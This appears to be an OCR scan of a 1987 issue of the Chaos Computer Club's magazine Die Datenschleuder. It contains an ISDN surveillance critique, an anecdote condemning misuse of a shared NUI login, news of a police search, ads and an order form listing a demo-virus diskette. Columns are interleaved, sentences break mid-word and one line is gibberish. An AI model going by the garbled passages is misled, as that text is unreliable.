Kritik ist aber auch aus sich selbst heraus verständlich. ZuB.l.b) Die “Verheimarbeitung“ der Arbeitnehmerschaft wird nicht durch die Verhinderung einer Einführung neuer Kommunikationstechniken erschwert/unmöglich gemacht. Im Gegenteil: Mit der existenten Technik kann der Anteil der Kommunikationsko­ sten an den Heimarbeitsplätzen ohne Schwierig­ keiten “aus der Portokasse“ bezahlt werden und wird durch ISDN voraussichtlich nur teurer. Die Schwierigkeiten liegen in den Bereichen der Organisation und Mitarbeiterführung, bzw. bei den heutigen Unternehmensstrukturen sind “Heimar­ beitsbüros“ meist zu teuer und insbesondere gelingt es noch nicht, durch die Netze ein ähnlich dichtes Geflecht von Informationsdynamik (Klatsch!) zu schleusen, wie in einer Bürogebäudesituation mit gemeinsamer Kantine - und das wird nach unseren Kommunikationserfahrungen in den Netzen glück­ licherweise auch nie möglich sein. Es stellt sich nämlich heraus, daß die Medienspezifik der digita­ len Kommunikationstechnologie weitgehend uner­ forscht ist und hier auf Kapitalseite erheblich über­ zogene Erwartungen bestehen, die sich auf Kriti­ kerseite in erheblich überzogenen Befürchtungen spiegeln. Siehe hierzu: “Teleheimarbeit ist kein Ren­ ner“ in “Die Angestellten“ der DAG vom 7.8.87. Das Argument, daß durch die digitale Verheimar­ beitung die gewerkschaftliche Organisation ge­ schwächt wird, stimmt nur teilweise. Klassische Heimarbeitsplätze - mit der bekannten fastUnmöglichkeit gewerkschaftlicher Organisation zeichnen sich dadurch aus, daß die Heimarbeiter nur durch persönliches Erscheinen an der Haustür er­ reichbar waren. Dies ist nun aber - durch das Netz - 22 nicht mehr der Fall und macht ironischerweise ge­ werkschaftliche Organisation einfacher als früher. Statt sich zum Abliefem eingegebener Texte in den Rechner des Arbeitgebers “einzuloggen“, kann sich der Heimarbeiter genausogut in eine Mailbox seiner Gewerkschaftsgruppe einwählen. Damit wollen wir nicht sagen, daß dadurch gewerkschaftliche Orga­ nisation besser/einfacher wird, die Situation ist je­ doch nicht so hoffnungslos, wie das oft dargestellt wird. Es ändern sich halt - technologiespezifisch gewerkschaftliche Organisationsformen genauso, wie sich auch die Produktionsformen verändern. Bewußtseinsmäßig ist hier nur die Kapitalseite in der Problemerkennung wesentlich weiter. Erfahrungen in England zeigen übrigens, daß re­ gionale Vorortzentren für Verwaltungstätigkeiten entstehen, die von mehreren Firmen gemeinsam be­ trieben und unterhalten werden und in letzter Kon­ sequenz zum “mietbaren“ Büro führen, wie dies vor ca. einem halben Jahr vom SPIEGEL aus Hamburg berichtet wurde. ZuB.l.c) Wiederum der gleiche Denkfehler der Autoren. Um alle die prognostizierten Entwicklungen im Dienst­ leistungsbereich eintreten zu lassen, braucht es kein ISDN, das geht VON DER TECHNIK her bereits heute über Telefonleitungen. Was fehlt, sind die “Programme“, das Know-How, wie sich solche Dienstleistungen maschinisieren lassen. Es sind die “Hacker“, die sich dieses Wissen heute spielerisch aneignen, mag es ihnen auch nicht bewußt sein. Und schon bald werden einige dieser Zunft ihre Erfah­ rungen verkaufen. Außerdem sollte man in Betracht ziehen, daß auch “den Kapitalisten“ inzwischen deutlich wird (wofür sind schließlich die Horden von Psychologen nach ’69 ausgebildet worden...), daß es so etwas wie “Psychoarbeit“ gibt - Stichwort: Ver­ kaufsfördernde Maßnahmen, “human touch“ (sic!). Anzumerken ist, daß ein Dienst wie BTX, der eine deutliche Trennung zwischen Anbieter und Kon­ sument macht, für den Konsumenten extrem im Preis heruntersubventioniert wird, während ein Dienst wie DATEX-P, der insbesondere für die interna­ tionale Vernetzung von Einzelnen und Gruppen gro­ ße Bedeutung hat (zB. PeaceNet in den USA bzw. GreenNet in GB), im Vergleich zu anderen Ländern sehr teuer ist. Damit pflegt die BP über ihre Ge­ bührenpolitik den Provinzialismus. Die Datenschleuder ZuB.2 Hier kommen die Autoren uE. endlich an den Kern der ISDN-Problematik. Die Mißbrauchsgefahren, die in dieser zentralisierten “eierlegenden Kommu­ nikationsmilchsau“ liegen, lassen die Herzen von Pinochet über Jaruselzki bis George Bush schneller schlagen. So, wie ISDN heute durch die CCITT standardisiert ist, wird es keine anonymen Anrufe mehr geben. In der Beziehung ist auf der politischen Ebene bisher kein Problembewußtsein entwickelt und die Techniker argumentieren Morgenstemmäßig: Es kann nicht sein, was nicht sein darf. Für die Ablehnung von ISDN finden sich sogar Bundesge­ nossen in der Mailboxindustrie, zumindest beim politisch bewußten Teil derselben. Noch einmal: aus technischen Gründen ist ISDN nicht notwendig. Die einzige Rechtfertigung dafür liegt in den Kapitalverwertungs/Neuinvestitionszwängen der Elektro­ nikindustrie. Zu B.2.b) Zum Abspeichern der Gespräche: Dies ist digital zu teuer, da durch die Digitalisierung das zu spei­ chernde Datenvolumen gegenüber analogem Dampftonband zu stark aufgebläht wird. Gefährlich ist in dem Zusammenhang jedoch, daß die Digita­ lisierung aller Signale einen Schritt näher an auto­ matisierte “Reizworterkennungsautomaten“ führt, die dann - in einer Hierarchie steigender “Wichtig­ keit“ - automatisch bestimmte Gespräche zur Auf­ zeichnung aus dem Telefonverkehr “herausfischen“. Aber auch das ist nichts Neues und wird heute bereits praktiziert. Einfacher wird durch ISDN das Mithö­ ren, Mitschneiden und Analysieren von Textkom­ munikation (zB. TEXTOR Programmpaket des BKA). Einziger Schutz - und das wird auch aus industriellen Interessen intensiv entwickelt - ist die Verschlüsselung aller Daten, die über irgendeine Leitung gesendet werden. terhin - parallel zu ISDN - auszubauen. An diesem Netz wird TELETEX als eine Art modernes TELEX betrieben. Für solche Situationen ist DEN GRÜNEN in Bonn eine partielle Teilnahme an PARLAKOM zu empfehlen, da im Rahmen von PARLAKOM geplant ist, die Heimatwahlkreise der Abgeordneten via TELETEX mit dem jeweiligen Abgeordneten­ büro in Bonn auf Kosten der Steuerzahler zu ver­ binden. Damit wäre dann im Katastrophenfall eine eigenständige Informationsmöglichkeit “von der Basis“ ins “Raumschiff Bonn“ gegeben. (Siehe dazu auch: ’STUDIE’ für den geplanten Computereinsatz der Fraktion DIE GRÜNEN im Auftrag des Deut­ schen Bundestages, Verlag Der Grüne Zweig, Nr. 117) Ein Vergleich mit der Plutoniumwirtschaft geht fun­ damental am Wesen der Rechnervernetzung vorbei. Eine Plutoniumwirtschaft ist extrem schutzbedürf­ tig auf Grund eines materiellen “Plutoniumhau­ fens“, der physikalisch an genau umgrenzter Stelle vorhanden ist und damit mögliches Ziel terroristi­ scher Angriffe darstellt. Demgegenüber zeichnet sich eine weitergehende Computervernetzung da­ durch aus, daß das Gesamtsystem immer redun­ danter d.h. (zer)störungsunanfälliger wird. Ein aus­ gefallenes Rechenzentrum kann innerhalb von Mil­ lisekunden durch Rechenkapazität an anderer Stelle ersetzt werden - dank der Vernetzung. In diesem Sinne wird von den Netzarchitekten durchaus schon in Begriffen von “Dezentralisierung“ und “Redun­ danz“ gedacht - ganz im Gegensatz zur Strommafia. Vor zwanzig Jahren hätte die Bombe im Rechen­ zentrum des Springer Verlags 2 - 3 Jahre Arbeit zunichte gemacht, wenn sie nicht nur eine Kloschüssel, sondern Plattenspeicher zerstört hätte. Die Zeiten sind jedoch lange vorbei und beim letzten Druckerstreik haben sich - dank Rechnerverbund kanadische Drucker als Streikbrecher einsetzen las­ sen. Zu B.2.c) Aspekte einer politischen Debatte zu ISDN Folgendes ist wichtig zu wissen: Nach Tschernobyl wurde kein Katastrophenalarm ausgelöst, so daß potentiell noch alle Telefone funktionierten und nicht nur die rot markierten für den Krisenfall. In ganzen Regionen brach deshalb der Telefonverkehr wegen Überlastung zusammen, so daß das Telefon­ netz nicht mehr zum Krisenmanagement taugte. Daraufhin ist auf Kabinettsebene beschlossen wor­ den, in Zukunft das eigentlich veraltete, digital ge­ schaltete DATEX-L Netz als Notstandsnetz wei­ Zur Zeit wild an der Zerschlagung der Bundespost als Kommunikationsmonopol gefingert. Siehe dazu die Dokumentation in der SZ Nr. 174 vom 1./2. August 1987 zu “Feststellungen und Empfehlungen der Regierungskommission“. Die Hauptinteressen dabei sind uE. wirtschaftlicher Natur unter dem Motto “Gewinne privatisieren, Verluste sozialisie­ ren“. Die Datenschleuder 23 Nach Einschätzung der Postgewerkschaft ist in Zu­ kunft wahrscheinlich mit folgender Situation zu rechnen: - Die Post wird aufgeteilt in unabhängige Verwal­ tungsbereiche für den gelben und grauen Bereich. Beim grauen Bereich verbleibt das Netzmonopol. Ein Minderheitenvotum, auch mindestens einen pri­ vaten Netzträger zuzulassen, fiel mit immerhin 6:6 Stimmen äußerst knapp aus. - Nur die BP ist Berechtigt, den Telefondienst an­ zubieten, jedoch endet ihr Monopol an der An­ schlußdose. allen elektronischen Netzen besteht, die nach unse­ rer Einschätzung die Mißbrauchsgefahr erheblich einschränkt bzw. diese Infrastruktur als Beherr­ schungsinstrument wenig tauglich macht. Klaus Schleisiek, Reinhard Schrutzki, Jürgen Wieck­ mann, Tom Todd, Thomas Esher, Udo Schacht Mitglieder im Arbeitskreis Politischer Compute­ reinsatz (APOC) ks 251950 Aug 87 BEREICH APOC BAG QUERFUNK.KRT CLINCH/POLITIK/KS/25.08.87/20:12/11558 Z. GEMEIN - Die ’Mehrwertdienste’ Datex, Telex, Teletex, Temex (die “ex“-Dienste) und der Endgerätemarkt werden zu 50% der BP belassen, der Rest dem Markt. Weder für die BP, noch für die freien Anbieter gibt es irgendwelche Auflagen, und die freien Anbieter müssen sich die benötigte Leitungskapazität beim grauen Monopolisten mieten/kaufen. - Es wird Privaten gestattet, eigene Grundstücke selber für die interne Kommunikation auch über andere Grundstücke hinweg zu verkabeln. Dies bedeutet keine änderung für die bürgerrechts­ relevanten Aspekte von ISDN gegenüber der jetzi­ gen Situation. Auch in Zukunft soll ein Monopolist der Betreiber des geplanten ISDN Netzes sein. Nebenbei: Die Essenz des Machtanspruchs der DBP leitet sich daraus ab, daß es gesetzlich verboten ist, Kommunikation über Grundstücksgrenzen hinaus von irgendjemand anderem als der Post machen zu lassen. (Sonderfall Bundeswehr). Die Bundesbahn hat nur deshalb ihr eigenes Telefonnetz, weil ihr “Grundstück“ sich über die gesamte Republik er­ streckt. Ich halte es im Sinne von Dezentralisierung und Basisdemokratie für eine grüne Forderung, die Legalisierung der “Verkabelung“ im Rahmen der Nachbarschaftshilfe zu fordern. Unseres Erachtens ist nicht die Vernetzung an sich der Sündenfall, sondern die Monopolisierung der Netzträgerschaft. Auch nach der heraufdämmernden Neustrukturie­ rung muß bei einem Mißbrauchsversuch nur eine Stelle usurpiert werden. Das kontrastiert immer noch erheblich mit der Situation in den USA, wo auf Grund des Fehlens eines Monopols jenseits der gel­ ben Post eine wahrhaft chaotische Situation in fast 24 Diese kleine unbedeutende Geschichte passierte vor zweieinhalb Jahren. Erst heute ward sie mir zugetragen und wir wollten den Daten nicht glau­ ben, die uns unsere Ohren ins Hirn spielte. Da gab es in unserer kleinen ’Galerie’ eine kleine Vorstellung des Chaos Computer Clubs. Es war nette intime Atmosphäre bei Mandarinen und Ap­ felmännchen. Nie waren mehr als 10 Leute gleich­ zeitig anwesend, aber da keiner der Kiddy-Cracks eine offizielle Leih-NUI hatte, war Not am Mann. Die Veranstaltung drohte langweilig zu werden. Und jeder neue Besucher wurde erst mal nach einer NUI gefragt. Und tatsächlich: Als schon keiner mehr dran glaubte, betrat ein netter junger Mann unsere Räume und nickte. Ja, er habe eine NUI und sei auch bereit, sie zur Verfügung zu stellen. Klasse. Und als er sie in die Tastatur tippte, schauten alle weg. Wir haben von ihm nie wieder etwas gehört. Den Grund dafür erfuhren wir erst jetzt: Die Rechnung, die die Post ihm pünktlich später aufmachte, belief sich auf etwa 7000 DM. Haben wirklich alle weggeschaut? Egal ob Biele­ felder oder Hamburger. Es ist einfach schweinisch, die NUI einer Privatperson als Leih-NUI zu ver­ wenden! Und wir sind nun solidarisch sauer. Mit zweieinhalb Jahren Verspätung. Davon kann sich unser Bielefelder Besucher nichts kaufen. Weitere Worte will ich mir sparen. Weder was von Moral auf der einen noch ’Confidenza’ auf der anderen Seite auch nix von Vorsicht und Datenhygiene/hysterie/hyäne. Ein jeder beantrage seine NUI selbst bei der POST. CLINCH/DS-RED/PADELUUN/04.10.87/22:24/1617 Z. Die Datenschleuder PRAKTISCHE CHAOS-MAGIE mit PETE CARROLL (GB) und FRATER V.’.D.'. (BRD) SEMINAR: "CHAOS-MAGIE UND FREISTILSCHAMANISMUS" Nach bewährter Art werden die Teilnehmer in den fünf chaosmagischen Grunddisziplinen Divination, Invokation, Evokation, Zauberei und Illumination ausgebildet, das Erlern­ te wird in der Praxis geprüft. Es handelt sich also um eine echte Einweihung in den Energiestrom der undogmatischen modernen Chaos-Magie. Für Anfänger wie für Fortge­ schrittene geeignet. * Aus dem Programm: Magischer Paradigmenwechsel in der Praxis * die Principia Magica, die Grundstrukturen der Magie * schamanische Praktiken und moderne Technologie * chaoistische Kampfmagie * Quantenzauber * der Technofetisch * Atavismu s und Traumarbeit * die Erschaffung von Psychogonen * Chaos-Magie und Gruppenarbeit * praktische Ein­ weihung * Kraftübertragung und Kraftabzug * Chaos-Magie und Runenarbeit * das magische Pentathlon * magisches Schaltkreistraining * Arbeit mit dem Chaos-Schirm * Heilungs- und Sprengglyphen * die Nacht des Schreckens * die Messe des Chaos u.a.m. * Seminartermine: 05.-08 . Juni 1987 ; Seminarort: Nähe Bern/Schweiz Seminargebühr: DM 560,- (Anzahlung: DM 260,-, Rest bei Seminarantritt) Strikte Begrenzung der Teilnehmerzahl - daher baldige Anmeldung empfohlen! Bitte beachten: Pete Carroll und Frater V.-.D. . führen jedes Seminar insgesamt nur drei Mal durch, um ermüdende Fließbandroutine zu vermeiden. Dieses ist die zweite Veranstaltung, also die vorletzte Chance für Sie, am Seminar "Chaos-Magie und Freistilschamanismus" teilzunehmen. AUS: "ANUBIS", Zeitschrift für Psychonatik, 6/87 anzeige Die Datenschleuder 25 Stückpreis Anzahl Summe Otobalb«ii«IM>atn Aui<«h« J mu 1W7 Kit trwhnan dm« ImUteo»w wrlwtm all» aim Vmmwa ihn SUaahaM. Wir bma. Mataa B«r MCh d*B HTWVÜS BbtwU*« Fftzfl n IWBttWB. Die Datenschleuder Die folgenden alten Ausgaben der Datenschleuder sind noch in unterschiedlicher Stückzahl erhältlich. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt zuerst. Gehen mehr Bestellungen ein, als Restexemplare vorhanden sind, gibts ersatzweise Aufbacker unserer Wahl. Stückpreis Anzahl Summe 2,50 Datenschleuder 01 Der CCC stellt sich vor / Hardware für Hacker / Die Hacker - Hymne 2,50 Datenschleuder 02 Hack mal wieder / Kodern ohne Offenbarungseid 2,50 Datenschleuder 03 Messen & Prüfen / BTX heisst Bildschirmtrix 2,50 Datenschleuder 04 Telebox / Ultravollständiges maximegalomanisches Wörterbuch aller Sprachen 2,50 Datenschleuder 05/06 Computer Tutorial / Packet Radio 2,50 Datenschleuder 08 Rat für Piraten / Postprüfsatz / Schrumpf,Bläh & Würfel 2,50 Datenschleuder 09 / 10 DFÜ-Grunzlagen / CCC '84 - Nachlese 2,50 Datenschleuder 11/12 Kennwort Hackfete / Computerkriminalität / Aus für Amateurfunk ? Datenschleuder 15 2,50 Wo bitte gibts ne NUI ? / Trara - die Post ist da! / WiKG 2.50 Datenschl euder 16 Hilfe Hacker / CCC - Satzung / NUI off Datenschleuder 17 2.50 CCC '86 / Computervirus 'Rush hour' / Kompromittierende Abstrahlung 2.50 Datenschleuder 18 Computerviren - Dokumentation / DPA hackt / Volkszählung '87 2.50 Datenschleuder 19 CeBit / Art wer ? / Volksquälung/ Modem-Chips Datenschleuderr 20 2.50 e / Erbsubstanz in der Rasterfahndung / Maschinenpersoprüfprogramm abonnieren, dürfens aber zwecks Aufbesserung unserer Kasse. 30.00 60.00 120.00 Summe dieser Seite 7.50 Rechtsfibel für den richtigen Umgang mit der Polizei und anderen Amtspersonen sowie Institutionen. Ein Ratgeber für Alle, die bei Wahrnehmung ihrer demo­ kratischen Rechte den richtigen Umgang mit staatlichen Organen üben wollen. 120 Seiten DIN A6 ISBN 3-88012-679-8 VMB 5.00 Was Sie gegen Mikrozensus und Volkszzählung tun können. Ein praktischer Ratgeber für alle, die sich mit der Volks­ zählung und den damit verbundenen Rechtsproblemen beschäftigen. 300 Seiten DIN A6 2001 Verlag 18061 5.00 Infopaket 1 - Computerviren Eine Dokumentation von S.Wernéry , die das Thema Computerviren ausführlich beleuchtet. Das Infopaket besteht aus einer MS-Dos Diskette 5 1/4“ mit einem Demo-Virus sowie 100 kB Dokumentationstexte. 25.00 3.33 Summe dieser Seite Bitte bei allen Bestellungen beachten: Alle Anfragen an den CCC etc. nicht zusammen mit der Bestellung auf uns loslassen, sondern mit getrennter Post schicken, das beschleunigt zumindest die Bearbeitung der Bestellung. Beigelegter Rückumschlag beschleunigt noch mehr, wenn selbiger auch noch ausreichend frankiert ist, kann es passieren, daß es teuflisch schnell geht. Manche Sachen sind manchmal nicht vorrätig. Wir erfüllen dann die Bestellung soweit als möglich und legen den Rest zurück, bis Material da ist. Achtet bitte auf schönste Sonntagschrift, wenn Ihr Eure Adresse nicht mit dem Drucker / Stempel anfertigt, wir haben keine Zeit dauernd mit den Fetzen in die Apotheke zu rennen. Sendungen mit besonderer Versendungsform ( Einschreiben. Nachnahme, etc) werden von uns grundsätzlich weder verschickt noch angenommen, es sind grundsätzlich nur die im Bestellfetzen aufgeführten Zahlweisen zulässig. Bestellfetzen 1987 Mitgliedschaft im Chaos Computer Club e.V. Jahresbeitrag für Schüler, Studenten, pipapo Betrag Summe 60.00 Jahresbeitrag für Otto Normaluser 120.00 Jahresbeitrag für besonders Finanzstarke (förderndes Mitglied) Studie für den geplanten Computereinsatz der Fraktion 'Die Grünen’ im Auftrag des Deutschen Bundestages 'Die Einführung der Computertechnik gestaltet sich für die Grünen im Bundestag so schwer, wie für andere der Ausstieg aus der Atomindustrie. Für beide geht es an die Strukturen.' Aufbacker ‘Achtung, Abhörgefahr' Din A4 - Bogen mit 64 Backern, ungeschnitten, postgelb Datenschleuder - Abos Gelten für jeweils ein Chaos - Jahr und umfassen etwa acht Ausgaben, sofern nicht höhere Gewalt anders entscheidet. CCC - Mitglieder erhalten die DS automatisch, müssen also nicht Sozialabo für Schüler, Studenten, Azubis, Renter, Wehrpflichtige, Ersatzdienstler und sonst sozial Benachteiligte Standardabo für Otto - Normaluser Förderabo für Gutbetuchte 33.33 Die Hackerbibel, Teil Eins Das unentbehrliche Nachschlagewerk für Hacker und solche, die es werden wollen. Texte von und für Hacker, Dokumentation, Meinungen, Lebenshilfe, Lesespass. Aus dem Inhalt :das Basic-Gefühl * Neues vom CCC * Der Code des HaSpa - Coups * Computer & totalitärer Staat * Satellitenhacking * und * und * und ... 260 Seiten Din A4 ISBN 3-922708-98-6 Grüner Zweig ab 240.00 Einmalige Verwaltungsgebühr bei Eintritt 20.00 Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert, aktiv an der Arbeit des Vereins teilzunehmen. Die Mitgliedschaft im CCC berechtigt zur Inanspruchnahme verbilligter Accounts auf der INFEX - Mailbox sowie zum Zugriff auf die Clubbretter der CLINCH Mailbox. Für alle Veranstaltungen des CCC wird ermäßigter Eintritt gewährt. Teilnahme an der INFEX - Mailbox Einmalige Eintragungsgebühr Mindestnutzung pro Monat 8.00 Verbindungsgebühr pro Minute Jede versandte 0.15 Nachricht 0.07 Datenbank, Telex, Intermail nach Nutzung Personenbogen Name Vorname Straße / Hausnummer Postleitzahl / Ort Bei Beitritt in den CCC sind zusätzlich die folgenden Angaben zu machen; Geburtsdatum Telefon 20.00 Bei Teilnahme an der INFEX oder CLINCH - Box sind zusätzlich die folgenden Angaben zu machen Benutzername Passwort zur Facheinrichtung Hilfszeile Die INFEX ist ein kommerzielles Mailboxsystem mit acht parallelen Ports, d.h. acht Benutzer können parallel im System arbeiten und die GeoNet - Dienstleistungen nutzen, zum Beispiel Datenbankdienste, Telexversand und - Empfang, Intermail zu anderen GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebühren werden direkt mit dem CCC abgerechnet, wir geben alle Gebühren zum Selbstkostenpreis weiter. Wer einen preiswerten Anschluß an die kommerzielle Mailboxszene sucht, ist mit Infex bestens bedient. Bei Benutzernamen und Passwort sind nur alphanumerische Zeichen A-Z, 0-9, sowie Satzzeichen Punkt und Bindestrich zulässig. Leerzeichen ist unzulässig. Teilnahme an der CLINCH - Mailbox Einmalige Eintragungsgebühr Monatsgebühr für Schüler etc. 2.00 Monatsgebühr für Normalverdiener Intermail, Telex, 5.00 etc nach Nutzung Bar in Postwertzeichen per V - Scheck per Überweisung (Zutreffendes markieren, andere Zahlweisen sind grundsätzlich nicht möglich) Ich zahle diesen Betrag Meine Mitglieds beitrage für den CCC werde ich künftig wie folgt zahlen: Uad zwar Die CLINCH - Mailbox ist ein nichtkommerzielles Mailboxprojekt, das versucht, eine preiswerte Alternative zu den kommerziellen Systemen zu sein. Derzeit stehen ein Telefon- und ein Datex-Port zur Verfügung, die wahlweise genutzt werden können. Die Leistungen der CLINCH - Box sind ein Subset der Leistungen von GeoNet Boxen, soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der Nutzungsbeiträge erfolgt direkt mit der CLINCH - Box. CCC - Mitglieder erhalten Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfügung stehen. Der CCC wickelt über die Box Koordinierungsaufgaben des Vorstands und der Redaktion der Datenschleuder ab. 26 Bar 1/4 - jährlich per V - Scheck 1/2 - jährlich per Überweisung jährlich So. Und nun bitte die Bestellseiten heraustrennen ( sie sollte, wenn alles klappt, ohne Verlust wertvoller DS - Texte aus der Mitte heraustrennbar sein), in einen Umschlag tüten und frankiert absenden, und zwar an uns: Chaos Computer Club e.V. Schwenckestraße 85 2000 Hamburg 20 Die Kontonummer für Überweisungen ist; 59 90 90 - 201 beim Postgirosamt Hamburg, Bankleidzahl 20010020, Kontoinhaber ist der Chaos Computer Club e.V. Die Datenschleuder B R IL L E A U F S E T Z E N ! 10.00 Und jetzt noch das dicke Ende: Bitte die Summen aller Seiten des Besteilfetzens addieren und hier eintragen. Meine Bestellung hat den Gesamtwert von DM IMPRESSUM Die Datenschleuder Numero 23 - Oktober 1987 Das wissenschaftliche Fachblatt für Daten­ reisende D-2000 Hamburg 20 Schwenckestrasse 85 Geonet: Geo1: Chaos-Team CLINCH: Chaos-Team Btx: * Chaos# tel: 040-4903757 / 040-483752 KURZ VOR SCHLUSS 27.10.1987 - Neue BKA-Aktlon Diesmal wg. NASA Herausgeber CCC e.V. ViSdP: Reinhard Schrutzki Mitarbeiter (u.a.): DDT, A. Eichler, P. Franck, H. Grusel, Herwart Holland-Moritz, jwi, KS, M. Kuehn, Andy M.-M., J. Nicolas, padeluun, Poetronic, S. Stahl, S. Wer- inery, TAM. Nachdruck für nichtgewerbliche Zwecke bei Quel­ lenangabe erlaubt. Überraschter GesichtsausDruck im Selbstverlag. Juli 1987 Das BKA ist zu dieser Stande mal wieder tätig. Nachdem man noch mehr als ein Jahr gebraucht hatte, um in Sachen CERN/PHILIPS gegen die Falschen loszuschlagen und gegen vier CCC-Mitglieder zu ermitteln, geht es in der NASA-Sache offenbar schneller. Sieben Beamte des BKA und der Hamburger Kriminal­ polizei durchsuchen derzeit die Privatwohnung eines CCC- Mitgliedes wegen des Verdachts der Ausspähung von Daten (§202 a StGB). Der seinerzeit geäußerte Verdacht, die BKA Aktion in den Räumen des CCC e.V. und zweier Vorstandsmitglieder habe nur dazu gedient, sich eine Grunddatensammlung zu verschaffen, um in anderen Fällen besser ermitteln zu können, scheint sich zu bestäti­ gen. Unklar ist, wer Urheber dieser neuen BKA-Aktion ist, denn der §202a StGB kann nur angewandt werden, wenn ein Betroffener Anzeige erstattet. Die Staatsanwaltschft kann nicht von sich aus tätig werden. You should not... Dies als kurze direkte Information, eine offi­ zielle Presseerklärung des CCC folgt in Kürze. CLINCH/CHAOS/SYSOP/27.10.87/18:06/971 Z. Hiermit möchte ich alle Datenschleuder-Leser drin­ gend davor warnen, die Telefonnummer 00490811 resp. 00490811 zu wählen. Nach dem Wählen der Nummer liegt bis zum Unterbrechen der Verbin­ dung (sprich auflegen) ein ca. 0,8 SekundenGebührentakt auf der Leitung, der zur Folge haben könnte, daß die Telefonrechnung rasant ansteigt. Und das muß doch wirklich nicht sein, oder? Andy 198709271400 TELWDS23.DOC Ls 16 CLINCH/SYSOP/GAST/27.09.87/18:34/469 Z. Die Datenschleuder Termin Am Wochenende 6./7. Dez. findet jeweils ab 10:00 in den Räumen des FORBIDeV (040-439 2336) eine Vorbereitungstagung für eine internationale Tagung im Oktober ’88 zum Thema “3. Welt und neue Technologien“ statt. KS 27 ISSN 0930-1045 HIER KANN IHRE WERBUNG STEHEN... Blick hinter den Spiegel Die Datenschleuder